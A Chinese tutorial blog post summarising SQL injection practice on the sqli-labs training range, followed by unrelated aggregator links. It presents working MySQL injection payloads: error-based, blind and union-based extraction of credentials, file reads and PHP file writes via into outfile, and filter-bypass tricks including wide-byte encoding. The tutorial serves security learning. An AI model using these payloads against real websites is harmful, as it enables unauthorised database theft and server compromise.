对一次sql注入学习的总结。
在这里插入图片描述

目录

  • 0x00 什么是SQL注入(SQL Injection)
  • 0x01 MySQL注入相关知识
    • 1.1 MySQL的一些小知识点
    • 1.2 MySQL 5.X 数据结构
    • 1.3 SQL语句学习(增、删、改、查)
    • 1.4 MySQL常用函数
    • 1.5 注释
  • 0x02 基于GET请求的注入
    • 2.1 数字型
    • 2.2 字符型
  • 0x03 基于POST请求的注入
    • 3.1 BurpSuite 介绍
    • 3.2 HTTP 头中的注入
      • 3.2.0 HTTP POST 的介绍
      • 3.2.1 User-Agent 注入
      • 3.2. 2 Referer 注入
    • 3.3 Cookie 注入
    • 3.4 Cookie Base64 注入
  • 0x04 盲注(Blind Injection)
    • 4.0 盲注介绍
    • 4.1基于真假的盲注
    • 4.2 基于时间的盲注
  • 0x05 MySQL 读写文件注入
    • 5.0 介绍
    • 5.1 读文件
    • 5.2 写文件
  • 0x06 报错注入
    • 6.1 updatexml函数
    • 6.2 extractvalue函数
    • 6.3 floor()函数
      • 6.3.0 floor()报错介绍
      • 6.3.1 floor()函数利用
  • 0x07 绕过
    • 7.1 大小写绕过
    • 7.2 双写绕过
    • 7.3 编码绕过
    • 7.4 内联注释绕过
    • 7.5 实例
      • 7.5.1 绕过去除注释符
      • 7.5.2 绕过剔除and和or关键字
      • 7.5.3 绕过剔除空格
      • 7.5.4 剔除黑名单(union和select)的绕过
      • 7.5.5 宽字节绕过
  • 0x08 二次注入
    • 8.0 二次注入介绍
    • 8.1 二次注入的代码分析
    • 8.2 二次注入利用
    • 8.3 二次注入的危害
  • 0x09 基本手工注入流程
    • 9.1 通过报错信息,猜测SQL语句
    • 9.2 order by 获取字段数
    • 9.3 数据库中表的获取
    • 9.4 表中字段的获取
    • 9.5 字段值的获取

0x00 什么是SQL注入(SQL Injection)

sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。

0x01 MySQL注入相关知识

1.1 MySQL的一些小知识点

  • Mysql中的大小写不敏感,大写和小写一样
  • Mysql 可以自动识别URL与Hex编码好的内容
  • 符号和关键字的替换:and -> && , or -> ||
  • 内联注释与多行注释:/*! 内联注释 / ,/ 多行注释 */

1.2 MySQL 5.X 数据结构

在Mysql 5.0以上的版本中,为了方便管理,默认定义了information_schema数据库,用来存储数据库信息。其中具有表schemata(数据库名)、tables(表名)、columns(列名或字段名)。

在schemata表中,schema_name字段用来存储数据库名

在tables表中,table_schema和table_name分别用来存储数据库名和表名。

在columns表中,table_schema(数据库名)、table_name(表名)、column_name(字段名)

1.3 SQL语句学习(增、删、改、查)

INSERT INTO table_name (列1, 列2,…) VALUES (值1, 值2,…)

DELETE FROM 表名称 WHERE 列名称 = 值

UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值

SELECT 列名称 FROM 表名称 WHERE 字段1 = ‘条件1’ AND 字段2 = ‘条件2’

1.4 MySQL常用函数

user():查看当前Mysql登录用户名
database():查看当前使用Mysql数据库名
version():查看当前Mysql版本

拓展limit关键字 limit m,n 从m行开始,到m+n行。

1.5 注释

注释符的作用:用于标记某段代码的作用,起到对代码功能的说明作用。但是注释掉的内容不会被执行。

Mysql中的注释符:
1、单行注释: --+ 或 --空格 或 #
2、多行注释: /* 多行注释内容 */

对于正常的SQL语句中,注释符起到说明作用的功能。但是对于在利用SQL注入漏洞过程中,注释符起到闭合 单引号、多单引号、双引号、单括号、多括号的功能

0x02 基于GET请求的注入

2.1 数字型

常见的SQL语句:

select login_name,password from users where id = $id; #直接将用户输入传给SQL语句,不添加任何符号

常用的payload:id = 1 or 1=1

2.2 字符型

常见的SQL语句:

select login_name,password from users where id ='$id'; #将用户输入包裹在单引号内(也可能是双引号、引号与括号的结合等等)

常用的payload:
1、id = 1’ # (注释符可自行选择)
2、id = 1’ or ‘1’ = '1

0x03 基于POST请求的注入

基于post请求的注入,无法像GET请求注入那样,可直接在URL中插入Payload,需要进行抓包,在HTTP信息正文中插入Payload。

3.1 BurpSuite 介绍

Burpsuite是一款Web安全测试的利器,集成了几乎Web安全测试中所有需要用到的功能。
在这里插入图片描述
这里仅对BurpSuite进行介绍,不讲解Burp Suite的使用
在这里插入图片描述

3.2 HTTP 头中的注入

3.2.0 HTTP POST 的介绍

POST 发送数据给服务器处理,数据包含在HTTP信息正文中

POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请求体中。

POST方法可能会创建新的资源或/和修改现有资源。

使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器:

常见http可能被污染的参数:
1、User-Agent :浏览器版本(少)
2、Referer :来源 (少)
3、X-Forwarded-For : 获取ip (高)
4、client_ip :获取ip (高)

漏洞出现的原因:
网站后台记录用户登录的浏览器信息、记录用户ip(在登录、记录浏览器信息的地方,容易发现该漏洞)

3.2.1 User-Agent 注入

User-Agent:使得服务器能够识别客户使用的操作系统,游览器版本等.(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中)

结合sqli-labs靶场中sqli-Less18 进行演示
查看源代码:
在这里插入图片描述

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

Payload:

’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or ‘1’='1
在这里插入图片描述

3.2. 2 Referer 注入

Rerferer:浏览器向 WEB 服务器表明自己是从哪个页面链接过来的.

sqli-labs靶场中的Sqli-Less19
源代码:
在这里插入图片描述

$insert=" INSERT INTO 'security'.'referers' ('referer','ip_address') VALUES ('$uagent','$IP')";

Payload:

’ and updatexml(1,concat(0x7e,version(),0x7e),1) or '1

在这里插入图片描述

3.3 Cookie 注入

Cookie介绍:
服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功能。另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息
都会写Cookies,以便在最后付款时提取信息

Sqli-Labs靶场中的Sqli-Less20
代码分析:
在这里插入图片描述
Payload:

’ and updatexml(1,concat(0x7e,user(),0x7e),1)–+

在这里插入图片描述

3.4 Cookie Base64 注入

Base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。

Cookie Base64注入与Cookie注入的区别:
Cookie Base64 对Cookie的值进行了Base64的编码,所以在进行插入Payload之前,要对Payload进行Base64编码

Sqli-Labs靶场中的Sqli-Less21
代码分析:
在这里插入图片描述
base64_decode(str) : PHP语言中用于解密Base64加密字符串的函数。

Payload:
admin’) and updatexml(1,concat(0x7e,version(),0x7e),1)#

Base64编码:
YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdmVyc2lvbigpLDB4N2UpLDEpIw==

在这里插入图片描述

0x04 盲注(Blind Injection)

4.0 盲注介绍

Blind SQL (盲注) 是注入攻击的其中一种, 向数据库发送 true 或 false 这样的问题, 并根据应用程序返回的信息判断结果. 这种攻击的出现是因为应用程序配置为只显示常规错误, 但并没有解决SQL 注入存在的代码问题.

演示盲注问题。当攻击者利用SQL注入漏洞进行攻击时, 有时候web应用程序会显示, 后端数据库执行SQL查询返回的错误信息. Blind SQL (盲注)与常规注入很接近, 不同的是数据库返回数据的检索方式. 若数据库没有输出数据到web页面, 攻击者会询问一些列的 true 或 false 问题, 强制从数据库获取数据

盲注常分为: 基于布尔型的盲注 和 基于时间的盲注.

在GET请求与POST请求的注入中都可能存在盲注

4.1基于真假的盲注

盲注不返回错误信息,如果在使用普通的SQL语句是无法探测出是否存在SQL 注入漏洞,所以我们需要构造特殊的Payload来探测是否存在注入漏洞,并通过不断测试来判断该是什么类型的SQL注入(数字型的或者字符型的)

构造一个错误的Payload,看是否会返回错误信息
http://192.168.1.2/sqlilabs/Less-8/?id=1
在这里插入图片描述

通常我们都是输入一个正确的数据,然后在后面拼上特殊构造的Payload的,此时我们通过对比两个Payload的带来的结构来判断是否存在注入漏洞

Payload:
and 1=1 --+
and 1=2 --+

当我们输入一个正确数据
http://192.168.1.2/sqlilabs/Less-8/?id=1
在这里插入图片描述
接着拼上Payload
http://192.168.1.2/sqlilabs/Less-8/?id=1’ and 1=1–+
在这里插入图片描述
对比另外一个Payload
http://192.168.1.2/sqlilabs/Less-8/?id=1’ and 1=2–+
在这里插入图片描述
此时可发现存在盲注,因此,我们可以构造更高级的Payload来探测出一些有用的信息

Payload:
’ and length(database())=N --+ //判断当前数据库名称的长度
’ and ascii(substr(database(),1,1)) = N --+ //判断当前数据库名称第一个字是什么

我们来尝试一个payload:
http://192.168.1.2/sqlilabs/Less-8/?id=1 and length(database())=8 --+
在这里插入图片描述

4.2 基于时间的盲注

基于时间的盲注,我们不在像基于真假注入那样,构造一真一假的payload来判断,而是要借助于sleep()函数构造正确的payload,通过页面响应的时间来判断是否存在盲注

payload:
’ and sleep(3) --+
在这里插入图片描述
由此我们可以判断出存在盲注,接着构造更高级的payload来得出我们想要的信息

payload:
’ and if(length(database())=8,sleep(3),null) --+
在这里插入图片描述

0x05 MySQL 读写文件注入

5.0 介绍

mysql数据库在渗透过程中使用的功能还是比较多的,除了读取数据之外,还可以对文件进行读写(但是前提是权限足够)

读取前提:
1、 用户权限足够高,尽量具有root权限
2、 secure_file_priv 不为NULL

(可使用sql命令行查看:show globe variables like “secure_file_priv”)
在这里插入图片描述

5.1 读文件

使用load_file()函数进行读取文件

http://192.168.1.2/sqlilabs/Less-1/?id=0’ union select 1,2,load_file(“c:\hey\123.txt”)–+

在这里插入图片描述

5.2 写文件

使用select … into outfile“路径” 语句将内容写入到指定路径

http://192.168.1.2/sqlilabs/Less-7/?id=0’)) union select “<?php phpinfo();?>”,2,3 into outfile “C:\phpstudy\PHPTutorial\WWW\sqlilabs\Less-7\hello.php”
–+

在这里插入图片描述

0x06 报错注入

6.1 updatexml函数

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据

select * from articles where id = 1 and updatexml(1,concat(0x7e,database(),0x7e),1);

在这里插入图片描述
(第一个参数任意数字都行,第二个参数必须使用concat函数,且需要并上0x7e编码或其他编码的符号,才能正确报错)

6.2 extractvalue函数

EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).

payload:

select * from articles where id =1 and extractvalue(1,concat(0x7e,version(),0x7e),1);

在这里插入图片描述

6.3 floor()函数

6.3.0 floor()报错介绍

报错注入形式上是两个嵌套的查询,即select …(select …),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到了几个sql函数:
rand()随机函数,返回0~1之间的某个值
floor(a)取整函数,返回小于等于a,且值最接近a的一个整数
count()聚合函数也称作计数函数,返回查询对象的总数
group by clause分组语句,按照查询结果分组
通过报错来显示出具体的信息。

查询的时候如果使用rand()的话,该值会被计算多次。在使用group by的时候,floor(rand(0)*2)会被执行一次,如果虚表不存在记录,插入虚表的时候会再被执行一次。在一次多记录的查询过程中floor(rand(0)2)的值是定性的,为011011
select count(
) from table group by floor(rand(0)*2);

6.3.1 floor()函数利用

Sqli-Labs靶场中的Sqli-Less5
Payload:
http://localhost/sqli-lab/Less-5/index.php?id= 0’ union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
在这里插入图片描述

0x07 绕过

7.1 大小写绕过

如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如:and 过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。

通过修改关键字内字母大小写来绕过过滤措施。例如:AnD 1=1 或 oR 1=1

例如:在进行探测当前表的字段数时,使用order by 数字进行探测。如果过滤了order ,可以使用OrdER来进行绕过。

7.2 双写绕过

如果在程序中设置出现关键字之后替换为空,那么SQL注入攻击也不会发生。对于这样的过滤策略可以使用双写绕过。因为在过滤过程中只进行了以此替换。就是将关键字替换为对应的空。

例如:过滤了union 只要发现union无论时大小写都会被替换为空。这个时候我们可以使用双写来进行尝试 uniunionon

其他关键字双写
and -> anandd
or -> oorr

7.3 编码绕过

在MySQL中能够识别URL或hex编码的内容,且自动进行解码,所以存在关键字或符号被过滤时,可以采用URL或hex编码来尝试绕过

可以利用网络中的URL在线编码,绕过SQL注入的过滤机制。(这里推荐一个在线编码的网站)
http://tool.chinaz.com/Tools/urlencode.aspx
在这里插入图片描述

7.4 内联注释绕过

在Mysql中内联注释中的内容可以被当作SQL语句执行,当一些关键词(select、union等等)被过滤的时候,可以使用内联注入尝试绕过。

在注释符号内的关键字不会被过滤掉,且能够被MySQL识别且执行。
在这里插入图片描述

7.5 实例

7.5.1 绕过去除注释符

在MySQL中常见的注释符:
1、单行注释: --+ 或 --空格 或 #
2、多行注释: /* 多行注释内容 */

这里要先了解preg_replace()函数,在分析去除注释符的代码
preg_replace(mixed $pattern , mixed $replacement , mixed $subject):执行一个正则表达式的搜索和替换。
$pattern: 要搜索的模式,可以是字符串或一个字符串数组
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。

代码分析:
在这里插入图片描述
绕过方法:
利用注释符别过滤不能成功闭合单引号等,换一种思路 利用 or ‘1’='1 闭合单引号等。

可在Sqli-Labs靶场中的Sqli-Less23进行实践

paylaod:
’ union select 1,user(),3 or 1='1
在这里插入图片描述

7.5.2 绕过剔除and和or关键字

在MySQL中 and 与 or 关键字可以 被 逻辑运算符 && 与 || 等价替换

代码分析:
在这里插入图片描述
绕过方法:
这里使用Sqli-Labs靶场中的Sqli-Less25进行演示

这里提供几种绕过的思路:

  1. 大小写变形绕过,Or,OR,oR,And,ANd等等(在Less25靶场中,这个方法无法进行绕过)
  2. 在这两个敏感词汇中添加注释,例如: a/**/nd 或 /*!and */
  3. 双写绕过: anandd ,oorr
  4. 利用逻辑运算符来替代 —— and -> && ,or -> ||

payload:
1’ oorr 1 = '1
在这里插入图片描述

7.5.3 绕过剔除空格

这里使用 Sqli-Labs 靶场中的 Sqli-Less25 进行演示

代码分析:
在这里插入图片描述
绕过思路:
1、使用其他编码进行代替绕过(URL、hex编码等):

  • %0a 新建一行
  • %0c 新的一页
  • %0d return功能
  • %0b 、%09 TAB键(垂直)
  • %20 空格

2、使用()来代替空格

payload:

-1’oorr(updatexml(1,concat(0x7e,version(),0x7e),1))anandd’1’='1

在这里插入图片描述

7.5.4 剔除黑名单(union和select)的绕过

这里使用 Sqli-Labs 靶场中的 Sqli-Less27 进行演示
代码分析:
在这里插入图片描述
绕过思路:

  1. 大小写
  2. 双写
  3. 编码
  4. 注释

payload:
-10000000%27%0a%0auniOn%0aSelecT%0a2,user(),3%0a||%0a%271

在这里插入图片描述

7.5.5 宽字节绕过

宽字节注入介绍:
GBK 占用两字节
ASCII占用一字节

PHP中编码为GBK,函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等宽字节字符集。

%DF’ :会被PHP当中的addslashes函数转义为“%DF’” ,“\”既URL里的“%5C”,那么也就是说,“%DF’”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MYSQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个宽字符。也就是“縗’”

最常使用的宽字节注入是利用%df,但是并不局限于这一个,只要范围在如下的都可以进行利用。
GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F)

使用 Sqli-Labs 靶场中的 Sqli-Less33 进行演示

这里先了解addslashes()函数,再对代码进行分析

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:

  • 单引号(’)
  • 双引号(")
  • 反斜杠(\)
  • NULL

该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

代码分析
在这里插入图片描述

payload:
-1%df’ union select 1,database(),version() --+
在这里插入图片描述

0x08 二次注入

8.0 二次注入介绍

在这里插入图片描述

二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。

也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但是在数据库内部调用读取语句的时候又被还原。

8.1 二次注入的代码分析

在这里插入图片描述
在这里插入图片描述

8.2 二次注入利用

注册用户 admin1‘ – - ,修改密码查看数据库内容。

先查看数据库的内容:
在这里插入图片描述
进行用户注册,用户名:admin1‘ – - 密码: 123
在这里插入图片描述
再次查看数据库内容,检查是否注册成功
在这里插入图片描述
对用户 admin1’ – - 进行密码修改
在这里插入图片描述
这个时候我们发现,admin1‘-- -用户的密码并未被修改,而用户admin1的密码被修改了,由此可发现二次注入的危害
在这里插入图片描述

8.3 二次注入的危害

  • 注入Payload触发二次SQL注入
  • 注入Payload触发XSS攻击。

0x09 基本手工注入流程

9.1 通过报错信息,猜测SQL语句

先构造错误的payload:
1\(缺少注释符)
在这里插入图片描述
提取返回的错误信息:“1”) LIMIT 0,1
可发现,用户输入被包裹在单引号和括号内,由此推测该查询语句是:

select Login_name,Password from users where id = ("id") LiMIT 0,1

9.2 order by 获取字段数

通过order by N 不断尝试,判断出正确的字段数
在这里插入图片描述
在这里插入图片描述

9.3 数据库中表的获取

使用联合查询语句(union select)来获取我们想要的信息。
1’ union select 字段1,字段2 ,字段3 from schemata where schema_name =database()#

注:
这里的字段数要于前面所判断出来的字段数一致,且用户输入要出错。这是由于union select 语句只能显示两个查询语句中的其中一个,只有前面的查询结果错误,才会显示后面union select语句查询的内容

payload:
0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

(group_concat(table_name)函数的作用:将table_name 字段内容显示在同一行里)

在这里插入图片描述
可以发现,users表中可能存在管理员的账号密码

9.4 表中字段的获取

payload:
0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ --+

在这里插入图片描述

9.5 字段值的获取

payload:
0’ union select 1,group_concat(username,0x3a,password),3 from users–+

(group_concat(username,0x3a,password)中的0x3a表示‘:’,username :password)在这里插入图片描述

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. windows 安装 python + pycharm

    1、下载python官网地址:https://www.python.org/getit/ (速度是真心慢)百度网盘:https://pan.baidu.com/s/10d5H1pp9lwp6QL6WBo2Hpg 提取码:4wh9 版本:3.8.3选择版本号,然后down就完了2、安装傻瓜式安装就行,值得注意的是,在下面的选项 ,最好选上;如果没选,则…...

    2024/4/25 0:00:35
  2. 高等计算机网络与通信笔记(七)

    P2P: 一种分散式的计算模型,与B/S、C/S相对应 B/S、C/S是集中式的计算模型 peer:安装特定应用软件的一个主机,可以是PC机,服务器,也可以是手机 用途: 1.解决C/S模式中的一些问题 1)集中式服务,碰到热点内容容易让服务器瘫痪 2)服务器必须一直在线,ip地址不能改变 2.…...

    2024/4/25 0:00:33
  3. iptables防火墙详解(一)

    Linux的防火墙体系主要工作在网络层,针对TCP/IP数据包实施过滤和限制,属于典型的包过滤防火墙(或网络层防火墙)。在Linux中netfilter和iptables都是指Linux防火墙。区别在于:netfilter:指的是Linux内核中实现包过滤防火墙的内部结构,不以程序或文件的形式存在,属于“内核…...

    2024/5/9 13:37:51
  4. Java值传递中的String类

    文章一:https://blog.csdn.net/wuwenxiang91322/article/details/17038557译文路径:String is passed by “reference”in JavaJava String对象以“引用”方式被传递这是Java的一个经典问题。很多类似的问题已经在StackOverflow被问,这里面有很多的不正确/不完整的答案。这个…...

    2024/4/28 15:32:11
  5. Nmap源码分析(脚本引擎)

    Nmap提供了强大的脚本引擎(NSE),以支持通过Lua编程来扩展Nmap的功能。目前脚本库已经包含300多个常用的Lua脚本,辅助完成Nmap的主机发现、端口扫描、服务侦测、操作系统侦测四个基本功能,并补充了其他扫描能力:如执行HTTP服务详细的探测、暴力破解简单密码、检查常见的漏…...

    2024/4/25 0:00:32
  6. 三分钟学会PS小清新调色教程-萧蕊冰

    今天的PS小教程教你三分钟学会PS小清新调色教程。夏天到了,夏天的阳光很大,拍出的照片都会有一种暖色的感觉,那么我们怎么把一张照片调成日式小清新呢?今天我们就来学一个PS小清新调色教程,让你体验一下日系美少女的感觉~原图和思路分析:色调偏暖黄、偏暗,后期整体色调偏…...

    2024/5/9 12:54:58
  7. 【Python】-帮学弟对象完成了一个简单的Python期末课程设计(银行自动取款机系统)

    大家好,我是被白菜拱的猪。 一个热爱学习废寝忘食头悬梁锥刺股,痴迷于girl的潇洒从容淡然coding handsome boy! 前因 嘀嘀嘀嘀,微信几百年没有消息的我,几个嘀嘀打破了下午的宁静 哥啊,发你一个python…ok,包在我身上。就是这么的热心肠。但是哈哈哈哈哈辛苦钱辛苦钱,这给…...

    2024/4/25 0:00:36
  8. 根据阿里巴巴编码规约(泰山版)整理的错误码

    根据阿里巴巴编码规约(泰山版)整理的错误码/*** 阿里巴巴Java编码规范,错误码*/ public enum ErrorCodeEnum {SUCCESS("00000", "成功"),USER_ERROR_0001("A0001", "用户端错误"),USER_ERROR_A0100("A0100", "用户注…...

    2024/5/9 12:48:20
  9. JS、JQuery实现随机点名系统(小案例)

    parseInt() 函数 parseInt() 函数可解析一个字符串,并返回一个整数。 parseInt(string, radix)parseInt("10"); //返回 10 parseInt("19",10); //返回 19 (10+9) parseInt("11",2); //返回 3 (2+1) parseInt("17",8); //返回 15…...

    2024/4/25 0:00:28
  10. 展望UWB技术

    一、什么是UWB? 1技术简介 UWB技术是一种利用纳秒级的非正弦波窄脉冲传输数据的无线载波通信技术。美国联邦通信委员会(FCC)对UWB信号定义如下: 即相对带宽大于20%或绝对带宽不小于500MHz。fH、fL、fC分别表示功率频谱密度的峰值衰减下降10dB时所对应的最大频率、最小频率及…...

    2024/4/25 0:00:25
  11. 高分拿下CKA后,分享超实用心得贴

    @[TOC]高分拿下CKA后,分享超实用心得贴 首先问个小问题,都说CKA,你知道它的来龙去脉吗? 前段时间疫情在家,集中自己的富余时间完成了CNCF官方基金会推出的CKA认证考试。 现在呢,和大家分享一下CKA考试的新的体会。 知识普及: CKA(Certified Kubernetes Administrator)…...

    2024/4/25 0:00:24
  12. 推荐10个经典的C++源代码

    转载于: https://www.cnblogs.com/dengnf/p/11345919.html 开源世界有许多优秀的开源项目,我选取其中十个最优秀的、最轻量级的C语言的项目,希望可以为C语言开发人员提供参考。 十个最值得阅读学习的C开源项目代码Webbench Tinyhttpd cJSON CMockery Libev Memcached Lua SQL…...

    2024/5/3 7:25:26
  13. 微信小程序路由

    wx.switchTab() 跳转到 tabBar 页面,并关闭其他所有非 tabBar 页面{"tabBar": {"list": [{"pagePath": "index","text": "首页"},{"pagePath": "other","text": "其他"…...

    2024/4/29 20:48:44
  14. 深度学习公开数据集汇总

    图像分类公开数据集 yann.lecun.com/exdb/mnist/ https://www.cs.toronto.edu/~kriz/cifar.html http://image-net.org/about-overview 目标检测公开数据集 http://host.robots.ox.ac.uk/pascal/VOC/ cocodataset.org/#home 目标跟踪公开数据集 https://www.youtube.com/watch?…...

    2024/4/17 23:38:16
  15. 网页版简单点名系统的实现(HTML5、CSS、JS、jQuery)

    网页版点名 实现的步骤: 1.搭建环境 2. 编写HTML和CSS代码把网页效果先写出来 3. 编写JS代码实现逻辑 4. 测试点名系统 搭建环境 创建一个HTML文件,导入JQuery文件,如下图:编写css将想呈现的效果编辑出来: <style type="text/css">body{background-color:…...

    2024/4/14 20:52:06
  16. ASP.NET高级

    1、Application 、Cookie和 Session 三种会话有什么不同?Application是用来存取整个网站全局的信息,而Session是用来存取与具体某个访问者关联的信息。Cookie是保存在客户端的,机密信息不能保存在Cookie中,只能放小数据;Session是保存在服务器端的,比较安全,可以放大数据…...

    2024/4/14 20:52:05
  17. 有人说Python不好?不存在的 带你来看下Python未来十年发展怎么样?

    以下观点是在基于理性分析后做出的预测!至2027年:Python系列教程,免费获取,遇到bug及时反馈,讨论交流可加扣裙<60 61 15 02 7>自动驾驶已相当成熟,大街上超过30%的汽车是无人驾驶的,很多私家车主在上班期间就把车开启自动驾驶模式,让它自己接单挣外快电动汽车续航可…...

    2024/5/3 8:44:15
  18. [leetcode/lintcode 题解] 微软面试题:骑士拨号器

    国际象棋中的骑士可以按下图所示进行移动:这一次,我们将 “骑士” 放在电话拨号盘的任意数字键(如上图所示)上,接下来,骑士将会跳 N-1 步。每一步必须是从一个数字键跳到另一个数字键。 每当它落在一个键上(包括骑士的初始位置),都会拨出键所对应的数字,总共按下 N位…...

    2024/4/27 21:24:49
  19. No.147-HackTheBox-Linux-Lightweight-Walkthrough渗透学习

    ** HackTheBox-Linux-Lightweight-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/166 靶机难度:中级(4.7/10) 靶机发布日期:2019年4月27日 靶机描述: Lightweight is a pretty unique and challenging box which showcases the common mista…...

    2024/5/6 6:16:54
  20. 等保2.0│不实施等保要求对企业有什么危害?

    01 等保2.0的实施对企业有什么影响? 等级保护是中国信息安全的基本制度,是指对国家重要信息、法人和其他组织及公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统实行安全保护。国家通过制定统一管理规范和技术标准,把信息系统按照重要程度由低到高划分为5个…...

    2024/5/3 6:31:19

最新文章

  1. MySQL系列之MySQL 存储引擎

    &#x1f339;作者主页&#xff1a;青花锁 &#x1f339;简介&#xff1a;Java领域优质创作者&#x1f3c6;、Java微服务架构公号作者&#x1f604; &#x1f339;简历模板、学习资料、面试题库、技术互助 &#x1f339;文末获取联系方式 &#x1f4dd; 往期热门专栏回顾 专栏…...

    2024/5/9 14:03:58
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/5/7 10:36:02
  3. 无人机/飞控--ArduPilot、PX4学习记录(5)

    这几天看dronekit&#xff0c;做无人机失控保护。 PX4官网上的经典案例&#xff0c;我做了很多注解&#xff0c;把代码过了一遍。 无人机具体执行了&#xff1a; 先起飞&#xff0c;飞至正上空10m->向北移动10m->向东移动10m->向南移动10m->向西移动10m->回到初…...

    2024/5/8 12:38:51
  4. 【APUE】网络socket编程温度采集智能存储与上报项目技术------多路复用

    作者简介&#xff1a; 一个平凡而乐于分享的小比特&#xff0c;中南民族大学通信工程专业研究生在读&#xff0c;研究方向无线联邦学习 擅长领域&#xff1a;驱动开发&#xff0c;嵌入式软件开发&#xff0c;BSP开发 作者主页&#xff1a;一个平凡而乐于分享的小比特的个人主页…...

    2024/5/6 2:28:08
  5. 【虚幻引擎】C++ slate全流程开发教程

    本套课程介绍了使用我们的虚幻C去开发我们的编辑器&#xff0c;扩展我们的编辑器&#xff0c;设置我们自定义样式&#xff0c;Slate架构设计&#xff0c;自定义我们的编辑器样式&#xff0c;从基础的Slate控件到我们的布局&#xff0c;一步步的讲解我们的的Slate基础知识&#…...

    2024/5/8 4:05:40
  6. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/8 6:01:22
  7. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/7 9:45:25
  8. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  9. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/9 4:20:59
  10. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  11. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

